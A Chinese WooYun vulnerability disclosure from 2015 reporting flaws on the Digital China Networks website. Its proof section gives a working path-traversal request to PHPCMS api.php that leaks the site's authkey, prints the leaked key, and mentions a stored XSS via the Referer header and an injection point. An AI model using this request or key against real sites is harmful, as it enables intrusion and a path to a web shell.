漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0113581
漏洞标题:神州数码DCN站某处设计缺陷可致authkey泄露getshell+存储xss
相关厂商:digitalchina.com
漏洞作者: 路人甲
提交时间:2015-05-12 09:39
修复时间:2015-05-17 09:40
公开时间:2015-05-17 09:40
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-12: 细节已通知厂商并且等待厂商处理中
2015-05-17: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
企业级宽带路由器_核心交换机_防火墙_存储_无线网络 - 神州数码网络有限公司(DCN)
详细说明:
http://www.dcnetworks.com.cn/
属于:企业级宽带路由器_核心交换机_防火墙_存储_无线网络 - 神州数码网络有限公司(DCN)
漏洞证明:
设计缺陷可致authkey泄露
PHPCMS最新版本authkey泄露可注射拿shell
WooYun: PHPCMS最新版本authkey泄露可注射拿shell
http://www.dcnetworks.com.cn/api.php?op=get_menu&act=ajax_getlist&callback=vwmcgevkwrndqfyuhtxa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
vwmcgevkwrndqfyuhtxa([",Q95G41gpQaqtgwpma278unEu8lgLwHPt,,,"])
存储xss
存在referer头部
其实这里还有一个注入点的
http://www.dcnetworks.com.cn/caches/caches_model/caches_data/content_input.class.php
哈哈!
修复方案:
...
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-17 09:40
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无